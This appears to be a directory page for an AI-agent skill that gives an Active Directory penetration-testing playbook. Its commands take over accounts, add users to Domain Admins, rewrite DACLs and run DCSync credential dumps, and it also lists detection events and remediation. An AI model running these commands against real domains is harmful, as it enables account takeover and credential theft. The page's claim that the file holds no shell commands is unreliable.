Agent skill

Acl Abuse

by ADScanPro in ADScanPro/Claude-AD

Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication…

MITAuto-check passedSecurity

Install Acl Abuse

skills CLI
$ npx skills add ADScanPro/Claude-AD --skill acl-abuse -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install ADScanPro/Claude-AD acl-abuse --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/acl-abuse .claude/skills/acl-abuse && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
acl-abuse
GitHub stars
211
Token cost
~2.6k tokens
SKILL.md length
1,002 words
Files
1
Skills in repo
7
Repo updated
First seen
Licence
MIT

At a glance

Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication…

  • BloodHound CE shows an outbound control edge from a principal you own toward a higher-value object
  • SKILL.md covers GenericAll, GenericWrite, ForceChangePassword and AddMember, plus 6 more sections
  • Instructions only: no scripts, shell commands, URLs or credentials in SKILL.md
  • You want the exact bloodyAD/impacket command to weaponize that ACE

What it does

Acl Abuse is an agent skill from ADScanPro/Claude-AD. Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication rights via DS-Replication-Get-Changes-All). Use when BloodHound CE shows an outbound control edge from a principal you own toward a higher-value object, and you want the exact bloodyAD/impacket command to weaponize that ACE, plus detection and remediation. DCSync is covered here strictly as a post-compromise technique…

Its SKILL.md is about 2.6k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.

It sits in Security, covering Red teaming and adversary simulation. The repository describes itself as: Active Directory pentest methodology for Claude Code: skills, agents and slash commands for internal AD red-team work (Kerberoasting, ADCS ESC1-17, DCSync, ACL abuse, NTLM relay… The licence is MIT.

When your agent uses it

  • BloodHound CE shows an outbound control edge from a principal you own toward a higher-value object
  • You want the exact bloodyAD/impacket command to weaponize that ACE
  • Plus detection and remediation

Example prompts

  • “/acl-abuse”

What it can do on your machine

Read from SKILL.md and the folder at commit 73efec5. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    No scripts in the folder and no shell commands in SKILL.md.

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Links to these hosts (documentation or services it may open):

    • thehacker.recipes

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Acl Abuse loads about 2.6k tokens when it runs. Until then it costs about 138 tokens; SKILL.md has 1,002 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~138
When it runs · the whole SKILL.md, loaded when a task matches
~2.6k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from ADScanPro/Claude-AD at commit 73efec5, republished under its MIT licence (© ADScanPro). 1,002 words, ~2,620 tokens.

Download SKILL.mdSave it as .claude/skills/acl-abuse/SKILL.md (or your agent's skills folder).
name
acl-abuse
description
Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication rights via DS-Replication-Get-Changes-All). Use when BloodHound CE shows an outbound control edge from a principal you own toward a higher-value object, and you want the exact bloodyAD/impacket command to weaponize that ACE, plus detection and remediation. DCSync is covered here strictly as a post-compromise technique, not a user entry path.

ACL Abuse

Active Directory permissions are a graph. A single misconfigured Access Control Entry (ACE), say a low-priv user with GenericAll over a group, WriteDacl over a computer, or WriteOwner over an OU, is a directed edge you can walk from where you are toward Domain Admin. This skill turns those edges into concrete commands with bloodyAD and impacket, after BloodHound CE (Apache-2.0, genuinely open source) has drawn the path.

Find the paths first (BloodHound CE). Collect with a standard collector, import into BloodHound CE, and look at the outbound control edges from your owned principal: GenericAll, GenericWrite, WriteDacl, Owns/WriteOwner, AddMember, ForceChangePassword, AllExtendedRights, and DCSync. Pre-built queries like "Shortest paths from Owned principals" and "Find principals with DCSync rights" hand you the chain.

Collect edges with a standard collector, for example:

nxc ldap 10.0.0.10 -u user -p 'Password123' --bloodhound --collection All --dns-server 10.0.0.10

or run rusthound-ce / SharpHound CE and import the ZIP into BloodHound CE.


GenericAll

MITRE ATT&CK: T1222 (Permission Modification) / T1098 (Account Manipulation)

What it is. Full control over the target object. What you do with it depends on the target type:

  • Over a user: reset their password (ForceChangePassword) or set an SPN and Kerberoast them (targeted roasting), or set DONT_REQ_PREAUTH and AS-REP roast.
  • Over a group: add yourself as a member (AddMember).
  • Over a computer: write RBCD (msDS-AllowedToActOnBehalfOfOtherIdentity) and impersonate (see the Kerberos skill).

Reset a user's password:

bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \
  set password TARGETUSER 'NewPass123!'

Add yourself to a group:

bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \
  add groupMember 'Domain Admins' owneduser

Targeted Kerberoast (set an SPN you control, then roast, see Kerberos skill):

bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \
  set object TARGETUSER servicePrincipalName -v 'fake/svc'
GetUserSPNs.py -request-user TARGETUSER -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123'

GenericWrite

MITRE ATT&CK: T1098

What it is. Write non-protected attributes on the target. Enough to set an SPN (targeted Kerberoast), set DONT_REQ_PREAUTH (targeted AS-REP roast), or write msDS-AllowedToActOnBehalfOfOtherIdentity on a computer (RBCD). Not enough to reset the password directly on a user (that is ForceChangePassword / GenericAll).

Set the preauth-disabled flag for a targeted AS-REP roast:

bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \
  add uac TARGETUSER -f DONT_REQ_PREAUTH
GetNPUsers.py -dc-ip 10.0.0.10 -request CORP.LOCAL/owneduser:'Password123'

Write RBCD on a computer you can then S4U through:

bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \
  add rbcd TARGET$ EVIL$

ForceChangePassword

MITRE ATT&CK: T1098

What it is. The User-Force-Change-Password extended right lets you reset the target user's password without knowing the old one. Straight account takeover of that user.

bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \
  set password TARGETUSER 'NewPass123!'

impacket alternative:

net rpc password TARGETUSER 'NewPass123!' -U 'CORP.LOCAL/owneduser%Password123' -S 10.0.0.10

Note: resetting an in-use account is noisy and disruptive; it locks the real user out. Prefer targeted Kerberoast/AS-REP where the edge allows, and coordinate password resets with the client.


AddMember

MITRE ATT&CK: T1098

What it is. Write access to a group's member attribute. Add a principal you control to a privileged group (a nested group that eventually reaches Domain Admins is just as good).

bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \
  add groupMember 'Backup Operators' owneduser

WriteDACL

MITRE ATT&CK: T1222.001 (Windows Permission Modification)

What it is. You can rewrite the target's DACL, so you grant yourself whatever ACE you want (up to full control) and then exploit that. The common escalation is to grant yourself the replication rights on the domain object (setting up DCSync, see below) or GenericAll on a user/group.

Grant yourself an ACE on the target (impacket dacledit):

dacledit.py -action write -rights FullControl -principal owneduser \
  -target-dn 'CN=TargetUser,CN=Users,DC=corp,DC=local' \
  -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123'

bloodyAD equivalent (grant a right on an object):

bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \
  add genericAll 'CN=TargetUser,CN=Users,DC=corp,DC=local' owneduser

WriteOwner / Owns

MITRE ATT&CK: T1222.001

What it is. You can set yourself as the owner of the target object. The owner can always rewrite the DACL, so WriteOwner chains into WriteDACL into full control. Two steps: take ownership, then grant yourself rights.

Take ownership (impacket owneredit):

owneredit.py -action write -new-owner owneduser \
  -target-dn 'CN=TargetUser,CN=Users,DC=corp,DC=local' \
  -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123'

Then grant yourself full control with dacledit (as above), then exploit as GenericAll.

bloodyAD one-liner for ownership:

bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \
  set owner 'CN=TargetUser,CN=Users,DC=corp,DC=local' owneduser

Show full SKILL.md (471 more words)Show less

Replication rights → DCSync (POST-COMPROMISE ONLY)

MITRE ATT&CK: T1003.006 (OS Credential Dumping: DCSync)

Frame this correctly. DCSync is not a user entry path. It is a post-compromise credential-extraction technique performed by a principal that already holds the directory replication extended rights, DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, on the domain object. In a healthy domain those rights belong only to Domain Controllers and to Domain/Enterprise Admins, so being able to DCSync normally means you are already Domain Admin (or the equivalent). It matters to ACL abuse only in one specific case: a non-DC, non-admin principal has been mis-granted those replication rights, usually as the result of a WriteDACL/WriteOwner chain above. In that case DCSync is the payoff of the ACL abuse, still executed after you have obtained (or granted yourself) the replication rights, never before.

So the ACL entry point is the mis-granted right (or granting it to yourself via WriteDACL on the domain object); the DCSync itself is the follow-on.

Grant the replication rights (only if you have WriteDACL on the domain head, the abusable misconfiguration):

dacledit.py -action write -rights DCSync -principal owneduser \
  -target-dn 'DC=corp,DC=local' -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123'

Then, holding those rights, replicate secrets (impacket secretsdump):

secretsdump.py -just-dc-user 'CORP\krbtgt' CORP.LOCAL/owneduser:'Password123'@10.0.0.10
secretsdump.py -just-dc CORP.LOCAL/owneduser:'Password123'@10.0.0.10   # full dump

netexec equivalent:

nxc smb 10.0.0.10 -u owneduser -p 'Password123' --ntds

Dumping krbtgt enables Golden Tickets; dumping the Administrator hash enables pass-the-hash. Both are post-DA persistence, not entry.


Detection (Event IDs)

  • 5136: a directory object was modified. This is the central ACL-abuse event: it fires on DACL changes, group membership changes, SPN writes, userAccountControl flips, RBCD writes, and owner changes. Watch the AttributeLDAPDisplayName (e.g. nTSecurityDescriptor, member, servicePrincipalName, msDS-AllowedToActOnBehalfOfOtherIdentity).
  • 5137/5139/5141: object created/moved/deleted, for the surrounding activity.
  • 4662: an operation was performed on an object. For DCSync, look for 4662 with the replication control access GUIDs 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (Get-Changes) and 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 (Get-Changes-All) requested by a principal that is not a Domain Controller, which is the tell that a non-DC is replicating.
  • 4738: a user account was changed (attribute-level).
  • 4728/4732/4756: a member was added to a security-enabled group.
  • Microsoft Defender for Identity raises "Suspected DCSync attack" on replication from a non-DC.

Remediation to write up

  • Audit ACEs. Enumerate non-default ACEs across users, groups, computers, OUs and the domain head. Any GenericAll/GenericWrite/WriteDacl/WriteOwner held by a non-Tier-0 principal over a privileged object is a finding.
  • Strip replication rights from everything that is not a DC. Only Domain Controllers and the intended Tier-0 admins should hold DS-Replication-Get-Changes-All. Remove it from every user/group/service account that has it.
  • Protect the domain head DACL. WriteDacl/WriteOwner on DC=corp,DC=local is game over; lock it to Tier-0.
  • Set MachineAccountQuota to 0 to kill the RBCD-via-new-computer variant.
  • Alert on 5136 changes to security descriptors and to member on privileged groups; alert on 4662 replication access from non-DCs.
  • Use tiered administration so the graph has no low-priv-to-Tier-0 edges in the first place.

Only exploit ACLs on systems you are authorized to test. Password resets are disruptive; coordinate. Use lab/generic DNs and names in write-ups.


Reference

© ADScanPro, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in skills/acl-abuse of ADScanPro/Claude-AD.

Open the folder on GitHubat commit 73efec5

Compare with similar skills

Acl Abuse next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Acl Abuse compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Acl Abuse this skillADScanPro/Claude-AD211—~2.6kAutomated safety check: PassMIT
Authorization Bypass DetectionTencent/AI-Infra-Guard6.8k—~753Automated safety check: PassApache-2.0
Run Assert Evalresponsibleai/ASSERT330—~11kAutomated safety check: NotesMIT
Osint Methodologyelementalsouls/Claude-OSINT2.8k—~8.7kAutomated safety check: NotesMIT
Lfd Designelvisun/loss-function-development176—~2.9kAutomated safety check: NotesMIT
Web Exfiltration DetectionTencent/AI-Infra-Guard6.8k—~1.8kAutomated safety check: PassApache-2.0

Similar skills

  • Authorization Bypass Detection

    Tencent/AI-Infra-Guard

    Probes an AI agent through dialogue for cross-user data access, privilege escalation and login bypass, and reports confirmed findings as structured vulnerability entries.

    6.8k GitHub stars~753 tokensUpdated today
    SecurityAuto-check passed
  • Run Assert Eval

    responsibleai/ASSERT

    Run an ASSERT evaluation against a described risk. An agent skill from responsibleai/ASSERT.

    330 GitHub stars~11k tokensUpdated today
    SecurityAuto-check: notes
  • Osint Methodology

    elementalsouls/Claude-OSINT

    Comprehensive OSINT methodology for external red-team operations and authorized attack-surface assessments.

    2.8k GitHub stars~8.7k tokensUpdated 1 mo ago
    SecurityAuto-check: notes
  • Lfd Design

    elvisun/loss-function-development

    Design a loss function and harness for a long-running /goal optimization run (loss-function development, LFD).

    176 GitHub stars~2.9k tokensUpdated 3 mo ago
    SecurityAuto-check: notes
  • Web Exfiltration Detection

    Tencent/AI-Infra-Guard

    Probes whether an agent with web fetch and stored user memory can be tricked by a malicious page into leaking data through chained URL paths.

    6.8k GitHub stars~1.8k tokensUpdated today
    SecurityAuto-check passed
  • Probes whether an agent can be hijacked by instructions hidden in documents, retrieved chunks or fetched web pages, using test prompts that embed a hidden instruction.

    6.8k GitHub stars~1.1k tokensUpdated today
    SecurityAuto-check: warnings

More from ADScanPro/Claude-AD

  • Ad Environment Constraints

    ADScanPro/Claude-AD

    Real-world Active Directory environment constraints that silently break attacks when ignored: NTLM disabled (Kerberos fallback), AES-only KDCs (RC4 blocked by GPO), LDAP signing and channel binding…

    211 GitHub stars~2.9k tokensUpdated 1 mo ago
    Auto-check: notes
  • Ad Opsec Telemetry

    ADScanPro/Claude-AD

    The telemetry each Active Directory technique generates and what alerts a defender: Kerberoasting produces Event 4769 with RC4 encryption (0x17) and an MDI alert, DCSync produces Event 4662 with the…

    211 GitHub stars~2.4k tokensUpdated 1 mo ago
    Auto-check passed
  • Adcs Attacks

    ADScanPro/Claude-AD

    Active Directory Certificate Services (AD CS) escalation techniques ESC1 through ESC17, driven by hand with Certipy (ly4k).

    211 GitHub stars~3.6k tokensUpdated 1 mo ago
    Auto-check passed
  • Coercion Ntlm Relay

    ADScanPro/Claude-AD

    Authentication coercion (PetitPotam MS-EFSR, PrinterBug MS-RPRN, DFSCoerce MS-DFSNM) chained into NTLM relay (impacket ntlmrelayx) toward LDAP, AD CS web enrollment (ESC8), or SMB.

    211 GitHub stars~1.9k tokensUpdated 1 mo ago
    Auto-check passed
  • Kerberos Attacks

    ADScanPro/Claude-AD

    Kerberos-based Active Directory attacks driven by hand with standard tooling (Kerberoasting, AS-REP roasting, and delegation abuse: unconstrained, constrained/S4U, RBCD).

    211 GitHub stars~2.9k tokensUpdated 1 mo ago
    Auto-check: notes
  • Compliance Mapping

    ADScanPro/Claude-AD

    A high-level conceptual mapping from Active Directory attack techniques to the compliance controls they touch.

    211 GitHub stars~1.7k tokensUpdated 1 mo ago
    Auto-check passed

Categories

Questions about Acl Abuse

What does Acl Abuse do?

Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication…. Acl Abuse is an agent skill from ADScanPro/Claude-AD. Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication rights via DS-Replication-Get-Changes-All).

When should I use Acl Abuse?

Acl Abuse fits situations like: bloodHound CE shows an outbound control edge from a principal you own toward a higher-value object; you want the exact bloodyAD/impacket command to weaponize that ACE; plus detection and remediation.

How do I install Acl Abuse in Claude Code?

Run `npx skills add ADScanPro/Claude-AD --skill acl-abuse -a claude-code`. Or copy the skill folder (skills/acl-abuse in ADScanPro/Claude-AD) into .claude/skills/acl-abuse in your project. Claude Code loads it when a task matches its description.

How do I install Acl Abuse in Codex?

Run `npx skills add ADScanPro/Claude-AD --skill acl-abuse -a codex`. Or copy the skill folder (skills/acl-abuse in ADScanPro/Claude-AD) into .agents/skills/acl-abuse in your project. Codex loads it when a task matches its description.

Can I use Acl Abuse in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add ADScanPro/Claude-AD --skill acl-abuse -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/acl-abuse, .gemini/skills/acl-abuse, .github/skills/acl-abuse and .opencode/skills/acl-abuse in your project.

What does Acl Abuse need to run?

SKILL.md names no scripts, command-line tools or credentials: Acl Abuse is instructions for the agent only.

Does Acl Abuse access the network?

SKILL.md names 1 domain. As links in the text: thehacker.recipes. This is read from the text; nothing was executed.

Is Acl Abuse safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Acl Abuse use?

Acl Abuse is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Acl Abuse use?

About 2.6k tokens (SKILL.md is roughly 10k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Acl Abuse?

Skills that share tags, products or a category with Acl Abuse: Authorization Bypass Detection (Tencent/AI-Infra-Guard, 6.8k stars), Run Assert Eval (responsibleai/ASSERT, 330 stars), Osint Methodology (elementalsouls/Claude-OSINT, 2.8k stars) and Lfd Design (elvisun/loss-function-development, 176 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Acl Abuse?

ADScanPro (a GitHub user) maintains it in ADScanPro/Claude-AD, which has 211 GitHub stars. The repository holds 7 skills in this directory. The repository was last updated on August 24, 2026.

Source: ADScanPro/Claude-AD on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.